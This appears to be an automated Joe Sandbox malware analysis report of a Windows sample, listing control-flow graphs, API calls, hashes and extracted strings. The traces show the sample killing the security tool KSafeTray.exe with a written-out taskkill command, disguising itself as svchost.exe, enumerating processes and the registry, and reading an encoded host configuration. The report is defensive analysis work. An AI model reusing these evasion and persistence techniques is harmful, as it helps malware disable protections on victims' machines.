VirtualProtect 20214->20217 20215->20214 20216->20177 20216->20182 20218 100027c0 GetInputState GetCurrentThreadId PostThreadMessageA GetMessageA 20216->20218 20217->20214 20218->20177 20220 40174b 20219->20220 20221 40173d 20219->20221 20223 401760 20220->20223 20224 401752 20220->20224 20222 4032b5 12 API calls 20221->20222 20228 401745 20222->20228 20226 401870 20223->20226 20238 40176e 20223->20238 20225 4019d0 7 API calls 20224->20225 20225->20228 20227 40198b 20226->20227 20237 401879 20226->20237 20227->20228 20229 401999 HeapReAlloc 20227->20229 20228->20211 20229->20227 20229->20228 20230 40182e HeapReAlloc 20230->20238 20231 401951 HeapReAlloc 20231->20237 20232 4017e7 HeapAlloc 20232->20238 20233 401915 HeapAlloc 20233->20237 20234 401f14 5 API calls 20234->20238 20235 4029b7 6 API calls 20235->20237 20236 402972 VirtualFree HeapFree VirtualFree 20236->20237 20237->20228 20237->20231 20237->20233 20237->20235 20237->20236 20238->20228 20238->20230 20238->20232 20238->20234 20239 401beb VirtualFree VirtualFree HeapFree 20238->20239 20239->20238 20242 405383 20240->20242 20243 405348 20240->20243 20241 4053bc 15 API calls 20241->20242 20242->20241 20242->20243 20243->20185 20245 4033c2 GetCurrentProcess TerminateProcess 20244->20245 20246 4033d3 20244->20246 20245->20246 20247 401b10 20246->20247 20248 40343d ExitProcess 20246->20248 20247->19956 20249 100fa534 20251 100fa53b 20249->20251 20252 100fa54e VirtualAlloc 20251->20252 20253 100fa795 20251->20253 20254 100fa58e 20252->20254 20255 100fa8f9 ExitProcess 20252->20255 20256 100fa79f 20253->20256 20257 100fa7a9 20253->20257 20259 100fa599 20254->20259 20257->20255 20260 100fa5a8 20259->20260 20261 100fa60a VirtualFree 20260->20261 20263 100fa632 20261->20263 20270 100fa7b0 20263->20270 20264 100fa676 20265 100fa795 20264->20265 20268 100fa776 VirtualProtect 20264->20268 20269 100fa8f9 ExitProcess 20264->20269 20266 100fa79f 20265->20266 20267 100fa7a9 20265->20267 20266->20253 20267->20269 20268->20265 20268->20268 20269->20253 20271 100fa855 ExitProcess 20270->20271 20274 100fa7be 20270->20274 20271->20264 20273 100fa7d7 20273->20264 20274->20271 20274->20273

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10001A51
                                                                                              • wsprintfA.USER32 ref: 10001A8D
                                                                                                • Part of subcall function 100018A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                                                                                                • Part of subcall function 100018A0: Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                                                                                                • Part of subcall function 100018A0: GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                                                                                                • Part of subcall function 100018A0: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                                                                                                • Part of subcall function 100018A0: GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                                                                                                • Part of subcall function 100018A0: _strcmpi.MSVCRT ref: 100019C8
                                                                                                • Part of subcall function 100018A0: CloseHandle.KERNEL32(00000000), ref: 100019D2
                                                                                                • Part of subcall function 100018A0: Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000002,00000000,00000004,00000080,00000000), ref: 10001AB5
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10001ABC
                                                                                              • Sleep.KERNEL32(000001F4), ref: 10001ACD
                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 10001ADF
                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,00000000), ref: 10001B20
                                                                                              • strstr.MSVCRT ref: 10001B33
                                                                                              • Sleep.KERNEL32(0000EA60), ref: 10001B54
                                                                                              • GetVersionExA.KERNEL32(?), ref: 10001B69
                                                                                              • GetSystemDefaultLCID.KERNEL32 ref: 10001B6F
                                                                                              • Sleep.KERNEL32(000493E0), ref: 10001BDB
                                                                                              • Sleep.KERNEL32(00124F80), ref: 10001BE9
                                                                                              • GetLocalTime.KERNEL32(?), ref: 10001BF3
                                                                                              • wsprintfA.USER32 ref: 10001C37
                                                                                              • _mkdir.MSVCRT ref: 10001C41
                                                                                              • Sleep.KERNEL32(000003E8), ref: 10001C4F
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10001CA9
                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 10001CC1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileSleep$CloseCreateCurrentDirectoryFirstHandleModuleNameProcessProcess32Systemwsprintf$CopyDefaultFindLocalNextOpenSnapshotTimeToolhelp32Version_mkdir_strcmpistrstr
                                                                                              • String ID: %s\%02d%02d%02d$%s\Default$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$2$2$2$5$5$5$5$7$7$8$8$8$AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==$HOST$\bb$\kk$\svchost.exe$\tt$a$c$c$c$c$c$c$d$f$f$h$h$h$h$h$k$m$m$m$o$o$o$o$o$o$open$p$p$p$t$t$t$t$t$t$t$t$x$x$x$x$x$x$x$z
                                                                                              • API String ID: 3656591282-2909406114
                                                                                              • Opcode ID: 178caa9a6ab39458405fe83c5bd611a03c837565114d2103d52ada2d58824686
                                                                                              • Instruction ID: 533d04cf14412c8a4f261862c8818537b5c493b5014bb58e8f027dad95579e4f
                                                                                              • Opcode Fuzzy Hash: 178caa9a6ab39458405fe83c5bd611a03c837565114d2103d52ada2d58824686
                                                                                              • Instruction Fuzzy Hash: D332803114C3C09AE331C6788859B9FBFD6ABE2704F48495DE2C95B2D2CAF59608C767

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 20 100022f0-1000234f call 10069820 call 10009720 * 3 29 10002360-100023af sprintf CreateMutexA GetLastError 20->29 30 10002351-10002353 20->30 31 100023b1-100023b9 CloseHandle ExitProcess 29->31 32 100023bf-10002436 GetCurrentProcessId OpenProcess SetPriorityClass CloseHandle GetProcessWindowStation OpenWindowStationA 29->32 30->29 33 10002355-10002357 30->33 35 10002438-10002439 SetProcessWindowStation 32->35 36 1000243f-10002475 SetErrorMode call 10003780 call 10009720 32->36 33->29 34 10002359-1000235b 33->34 37 100027a3-100027ba 34->37 35->36 42 100024b0-100024b7 36->42 43 10002477-100024ab call 1000c4f0 call 1000c520 call 1000c660 36->43 44 100024bc-100024c2 42->44 43->42 46 10002504-10002509 44->46 47 100024c4-100024c6 44->47 50 100025d6-1000260a call 10009720 call 10001160 call 100011b0 46->50 51 1000250f-10002510 46->51 47->46 49 100024c8 47->49 53 100024ca-100024e3 OpenEventA 49->53 84 10002627-10002646 GetTickCount call 10003940 50->84 85 1000260c-10002612 50->85 55 10002512-10002513 51->55 56 10002585-100025b9 call 10009720 call 10001160 call 100011b0 51->56 58 100024f4-100024fe call 10003db0 CloseHandle 53->58 59 100024e5-100024f0 Sleep 53->59 62 10002515-1000251b 55->62 63 1000252f-10002564 call 10009720 call 10001160 call 100011b0 55->63 56->84 86 100025bb-100025c1 56->86 58->46 59->53 66 100024f2 59->66 70 10002526-1000252d 62->70 71 1000251d-10002523 ??3@YAXPAX@Z 62->71 63->84 94 1000256a-10002570 63->94 66->46 70->44 71->70 95 10002648-1000264d 84->95 96 10002669-100026ce GetTickCount call 10001600 call 1000c450 call 10004060 84->96 88 10002614-1000261a ??3@YAXPAX@Z 85->88 89 1000261d-10002622 85->89 92 100025c3-100025c9 ??3@YAXPAX@Z 86->92 93 100025cc-100025d1 86->93 88->89 89->44 92->93 93->44 97 10002572-10002578 ??3@YAXPAX@Z 94->97 98 1000257b-10002580 94->98 95->89 99 1000264f-10002650 95->99 108 100026d0-100026de call 1000ce20 96->108 97->98 98->44 99->93 101 10002656-10002657 99->101 101->98 103 1000265d-10002664 101->103 103->44 111 100026e0-100026eb Sleep 108->111 112 100026ed-100026fb call 1000ce20 108->112 111->108 111->112 115 10002716 GetTickCount 112->115 116 100026fd-10002711 call 1000c660 112->116 118 10002718-1000274a OpenEventA WaitForSingleObject Sleep 115->118 116->44 120 10002752-100027a2 call 10003db0 CloseHandle call 1000c660 SetErrorMode ReleaseMutex CloseHandle call 10003880 118->120 121 1000274c-1000274e 118->121 120->37 121->118 122 10002750 121->122 122->116
                                                                                              APIs
                                                                                                • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                                • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                                • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                                • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                                                                                • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                              • sprintf.MSVCRT ref: 10002389
                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 1000239C
                                                                                              • GetLastError.KERNEL32 ref: 100023A4
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100023B2
                                                                                              • ExitProcess.KERNEL32 ref: 100023B9
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 100023BF
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 100023CC
                                                                                              • SetPriorityClass.KERNEL32(00000000,00000080), ref: 100023DA
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100023E1
                                                                                              • GetProcessWindowStation.USER32 ref: 1000241D
                                                                                              • OpenWindowStationA.USER32(winsta0,00000000,02000000), ref: 1000242E
                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 10002439
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 10002441
                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 100024D9
                                                                                              • Sleep.KERNEL32(0000003C), ref: 100024E7
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100024FE
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000251E
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 10002573
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 100025C4
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 10002615
                                                                                              • GetTickCount.KERNEL32 ref: 1000262D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@Process$CloseHandleOpenResourceStationWindow$Error$??2@ClassCountCreateCurrentEventExitFindLastLoadLockModeMutexPrioritySleepTicksprintf
                                                                                              • String ID: AAAAAA$BBBBBB$CCCCCC$KKKKKK$winsta0
                                                                                              • API String ID: 2686462936-682215413
                                                                                              • Opcode ID: e406c62dd523f7dc9c94be31558856dc13c0563786ec41141663d567de75603a
                                                                                              • Instruction ID: d6d9c746deec09ccf39e80aeb4b031731eb3513f19be3073a2d6536fba1e20fc
                                                                                              • Opcode Fuzzy Hash: e406c62dd523f7dc9c94be31558856dc13c0563786ec41141663d567de75603a
                                                                                              • Instruction Fuzzy Hash: 29C1E4B55083819BF721DF64DC85F9B7799EB85380F00092DFA8993286DB74AD48C7A3

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                                                                                              • Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                                                                                              • GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                                                                                              • GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                                                                                              • _strcmpi.MSVCRT ref: 100019C8
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100019D2
                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 10001A01
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandleProcessProcess32$CreateCurrentFileFirstModuleNameNextOpenSnapshotToolhelp32_strcmpi
                                                                                              • String ID: .$l$o$p$r$r$x$x
                                                                                              • API String ID: 3180913536-1602884452
                                                                                              • Opcode ID: ce14598f8a94e0c081870103145813617294ce4fd463c73516f04534971c8f84
                                                                                              • Instruction ID: 3eff10a53c0cd3c299c3f0263232e505e9bf148dbb3316f1d2a2e0806b88e0d6
                                                                                              • Opcode Fuzzy Hash: ce14598f8a94e0c081870103145813617294ce4fd463c73516f04534971c8f84
                                                                                              • Instruction Fuzzy Hash: 0C41B4311093C19AF311CA28C8057DF7BD5EB96394F04096DF5D4962D1DBB8EA0C87A7

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                                • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                                • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                                • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                                                                                • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 10001546
                                                                                              • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                                                                                              • ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                                                                                              • wsprintfA.USER32 ref: 100015B5
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100015BB
                                                                                              • wsprintfA.USER32 ref: 100015CA
                                                                                              • lstrlen.KERNEL32(?), ref: 100015D6
                                                                                              • wsprintfA.USER32 ref: 100015E2
                                                                                              • lstrlen.KERNEL32(?), ref: 100015E8
                                                                                                • Part of subcall function 10001380: wsprintfA.USER32 ref: 100013C0
                                                                                                • Part of subcall function 10001380: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                                                                                                • Part of subcall function 10001380: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                                                                                                • Part of subcall function 10001380: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                                                                                                • Part of subcall function 10001380: CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$wsprintf$Resource$CloseCreateDirectoryFindHandleSystemlstrlen$??2@??3@FirstLoadLockReadWrite
                                                                                              • String ID: Default$XXXXXX
                                                                                              • API String ID: 725747062-3873574582
                                                                                              • Opcode ID: 0e0a1ed6f2c2dd669fb9ea203f7d5d0876e1410452d1336e98ef23fb2d9b3107
                                                                                              • Instruction ID: 40cba41667d06f7893b38b0f0d94b15b22b4201403879db7e592d3493172572b
                                                                                              • Opcode Fuzzy Hash: 0e0a1ed6f2c2dd669fb9ea203f7d5d0876e1410452d1336e98ef23fb2d9b3107
                                                                                              • Instruction Fuzzy Hash: 4C31083120030467E318CB74DC91EEF379AEBC5771F040B2DFA56971C0DEA4AE0982A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7866654836aa60b89e9f9a1f09a6f3a833012675fa39c20709ec962009edebc5
                                                                                              • Instruction ID: e16900cb5c4ece056a77d287793db1095366f4d6b5bb26a23405047953fa84d7
                                                                                              • Opcode Fuzzy Hash: 7866654836aa60b89e9f9a1f09a6f3a833012675fa39c20709ec962009edebc5
                                                                                              • Instruction Fuzzy Hash: 6B41B2B27003056FE714DF68AC81B67B398EB88355F14443AFA06EB691DAB5E81486A4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 129 1000d900-1000d974 RegOpenKeyExA 130 1000d976-1000d99c call 1000dd1f 129->130 131 1000d99d-1000d9a3 129->131 133 1000d9a9 131->133 134 1000daaa-1000dac9 call 1000dd1f 131->134 133->134 137 1000db42-1000db84 RegEnumKeyExA 133->137 138 1000dd02-1000dd1a lstrcat 133->138 139 1000daa3 133->139 140 1000d9c4-1000d9ee RegQueryValueExA 133->140 141 1000dce5-1000dcfc 133->141 142 1000da07-1000da31 RegQueryValueExA 133->142 143 1000daca-1000daf4 RegQueryValueExA 133->143 144 1000dc6a-1000dc76 133->144 145 1000dccb-1000dce3 133->145 146 1000d9b0-1000d9b7 133->146 147 1000db11-1000db37 RegQueryValueExA 133->147 148 1000dc78-1000dc7f 133->148 149 1000dbde-1000dc50 RegEnumValueA 133->149 150 1000dc9e-1000dcc9 wsprintfA 133->150 137->134 152 1000db8a-1000dbd9 wsprintfA 137->152 139->134 140->134 157 1000d9f4-1000da05 call 1000d8d0 140->157 155 1000dcfd-1000dcff wsprintfA 141->155 142->134 158 1000da33-1000da42 142->158 143->134 160 1000daf6-1000db0f wsprintfA 143->160 154 1000dc84-1000dc9c wsprintfA 144->154 145->155 146->134 156 1000d9bd 146->156 147->134 151 1000db3d 147->151 148->154 149->134 153 1000dc56-1000dc5d 149->153 150->138 151->139 152->137 153->138 162 1000dc63 153->162 154->138 155->138 156->134 156->138 156->140 156->141 156->142 156->143 156->144 156->145 156->147 156->148 156->150 167 1000da85-1000daa1 157->167 163 1000da48-1000da4b 158->163 160->139 162->138 162->141 162->144 162->145 162->148 162->150 165 1000da4d-1000da7d strncat * 2 strchr 163->165 166 1000da7f 163->166 165->163 166->167 167->139
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                                                                                • Part of subcall function 1000DD1F: RegCloseKey.ADVAPI32(?,1000DAB6), ref: 1000DD29
                                                                                                • Part of subcall function 1000DD1F: RegCloseKey.ADVAPI32(?), ref: 1000DD32
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$Open
                                                                                              • String ID: %-25s %-15s $%-25s %-15s %s $%-25s %-15s 0x%x(%d) $REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
                                                                                              • API String ID: 2976201327-1612119606
                                                                                              • Opcode ID: 18a16f3152cab2c84c8789727149057d95980c577145fc1441e5c8d43feecb8f
                                                                                              • Instruction ID: 5f681d0d18a1945acf8fc48913839280a3791203cc6d3613b66fb068a083d58d
                                                                                              • Opcode Fuzzy Hash: 18a16f3152cab2c84c8789727149057d95980c577145fc1441e5c8d43feecb8f
                                                                                              • Instruction Fuzzy Hash: 13C187B19006589FEB14DF94CC84FEE73B9EB88300F504699F619A3184DBB4AE45CFA5

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,100022F0,00000000,00000000,00000000), ref: 10002ACF
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10002AD8
                                                                                                • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                                                                                • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                                                                                • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                                                                                • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                                                                                • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10002820,00000000,00000000,00000000), ref: 10002B17
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10002B1A
                                                                                              • Sleep.KERNEL32(000001F4), ref: 10002B21
                                                                                              • WinExec.KERNEL32(taskkill /f /im KSafeTray.exe,00000000), ref: 10002B3B
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10002930,00000000,00000000,00000000), ref: 10002B50
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10002B53
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002B94
                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002BA4
                                                                                              • lstrcat.KERNEL32(?,1007A0CC), ref: 10002BBA
                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 10002BD6
                                                                                              • lstrcat.KERNEL32(?,.exe), ref: 10002BE2
                                                                                              • MoveFileA.KERNEL32(?,?), ref: 10002BF1
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10001A20,00000000,00000000,00000000), ref: 10002C18
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10002C1B
                                                                                              • Sleep.KERNEL32(0002BF20), ref: 10002C22
                                                                                                • Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                                                                                • Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                                                                                • Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                                                                                • Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$CloseHandleThread$Resourcelstrcat$??2@FileSleep$??3@DirectoryExecFindFirstLoadLockModuleMoveNameProcess32SnapshotToolhelp32Windows_strcmpi
                                                                                              • String ID: .exe$KSafeTray.exe$LLLLLL$Rstray.exe$SSSSSS$XXXXXX$taskkill /f /im KSafeTray.exe
                                                                                              • API String ID: 1427586252-36606792
                                                                                              • Opcode ID: 23f35e04005e4586122a6e20164817315ee34bf34b4add223461127f64101a58
                                                                                              • Instruction ID: e5db488d9108fed6223139133818c57053fb22d89266da83dd4b914657c10bfb
                                                                                              • Opcode Fuzzy Hash: 23f35e04005e4586122a6e20164817315ee34bf34b4add223461127f64101a58
                                                                                              • Instruction Fuzzy Hash: 6A31B2B568034576F620EBA08C87FDA3399DB85B84F104914F745BA0C6DBF8F88486B9

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002959
                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002969
                                                                                              • lstrcat.KERNEL32(?,1007A0CC), ref: 1000297F
